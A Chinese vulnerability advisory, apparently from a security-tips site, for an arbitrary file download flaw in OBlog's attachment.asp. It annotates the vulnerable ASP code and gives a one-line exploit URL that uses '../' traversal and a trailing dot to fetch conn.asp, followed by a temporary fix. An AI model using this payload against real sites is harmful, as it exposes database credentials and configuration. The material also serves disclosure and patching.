手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >OBlog任意文件下载漏洞
OBlog任意文件下载漏洞
摘要:Path=Trim(Request("path"))'获取用户提交的路径FileID=Trim(Request("FileID"))IfFi...

Path=Trim(Request("path"))'获取用户提交的路径

FileID=Trim(Request("FileID"))

IfFileID=""AndPath=""Then

Response.Write"参数不足"

Response.End

EndIf

...

IfCheckDownLoadOr1=1Then

IfPath=""Then

setrs=Server.CreateObject("ADODB.RecordSet")

link_database

SQL=("selectfile_path,userid,file_ext,ViewNumFROMoblog_upfileWHEREFileID="&CLng(FileID))

rs.opensql,conn,1,3

IfNotrs.EofThen

uid=rs(1)

file_ext=rs(2)

rs("ViewNum")=rs("ViewNum")+1

rs.Update

downloadFileServer.MapPath(rs(0)),0

Else

Response.Status=404

Response.Write"该附件不存在!"

EndIf

rs.Close

Setrs=Nothing

Else

IfInStr(path,Oblog.CacheConfig(56))>0Then'Tr4c3标注:注意这里,仅仅判断用户提交的路径是否包含UploadFiles,为真则调用downloadfile函数下载文件

downloadFileServer.MapPath(Path),1

Endif

EndIf

Else

'如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果

IfPath=""Then

Response.Status=403

Response.WriteShowDownErr

Response.End

Else

downloadFileServer.MapPath(blogdir&"images/oblog_powered.gif"),1

Endif

Endif

Setoblog=Nothing

SubdownloadFile(strFile,stype)

OnErrorResumeNext

Server.ScriptTimeOut=9999999

DimS,fso,f,intFilelength,strFilename

strFilename=strFile

Response.Clear

Sets=Server.CreateObject(oblog.CacheCompont(2))

s.Open

s.Type=1

Setfso=Server.CreateObject(oblog.CacheCompont(1))

IfNotfso.FileExists(strFilename)Then

Ifstype=0Then

Response.Status=404

Response.Write"该附件已经被删除!"

ExitSub

Else

strFilename=Server.MapPath(blogdir&"images/nopic.gif")

Endif

EndIf

Setf=fso.GetFile(strFilename)

intFilelength=f.size

s.LoadFromFile(strFilename)

IfErrThen

Response.Write("<h1>错误:</h1>"&Err.Description&"<p>")

Response.End

EndIf

Setfso=Nothing

DimData

Data=s.Read

s.Close

Sets=Nothing

DimContentType

selectCaseLCase(Right(strFile,4))

Case".asp",".mdb",".config",".js"'Tr4c3标注:再看这里,想起来什么来了?对了,前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html],利用方法也相似,神奇的"."又派上用场了。

ExitSub

Case".asf"

ContentType="video/x-ms-asf"

Case".avi"

ContentType="video/avi"

Case".doc"

ContentType="application/msword"

Case".zip"

ContentType="application/zip"

Case".xls"

ContentType="application/vnd.ms-excel"

Case".gif"

ContentType="image/gif"

Case".jpg","jpeg"

ContentType="image/jpeg"

Case".wav"

ContentType="audio/wav"

Case".mp3"

ContentType="audio/mpeg3"

Case".mpg","mpeg"

ContentType="video/mpeg"

Case".rtf"

ContentType="application/rtf"

Case".htm","html"

ContentType="text/html"

Case".txt"

ContentType="text/plain"

CaseElse

ContentType="application/octet-stream"

Endselect

IfResponse.IsClientConnectedThen

IfNot(InStr(LCase(f.name),".gif")>0OrInStr(LCase(f.name),".jpg")>0OrInStr(LCase(f.name),".jpeg")>0OrInStr(LCase(f.name),".bmp")>0OrInStr(LCase(f.name),".png")>0)Then

Response.AddHeader"Content-Disposition","attachment;filename="&f.name

EndIf

Response.AddHeader"Content-Length",intFilelength

Response.CharSet="UTF-8"

Response.ContentType=ContentType

Response.BinaryWriteData

Response.Flush

Response.Clear()

EndIf

EndSub

<*参考:

Tr4c3[at]126[dot]com

*>

测试方法:

[警告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

########################################################################

利用方法:

http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.

########################################################################

建议:

修补建议:

等待官方发布新的补丁程序。

########################################################################

临时解决办法:

将attachment.asp第5行Path=Trim(Request(”path”))改成Path=Replace(Trim(Request(”path”)),”..”,”")

########################################################################

【OBlog任意文件下载漏洞】相关文章:

游戏外挂分析

教你利用Log备份获取Webshell

BBSXP5.15最新漏洞精简版

Oblog3.0漏洞曝光

PollVote投票系统漏洞利用

获得leadbbs论坛站webshell后进后台最简便之法

FLASH 0DAY 详细分析和总结图文

O-blog漏洞暴光

sql注入建立虚拟目录

UBB的跨站脚本攻击的漏洞

精品推荐
分类导航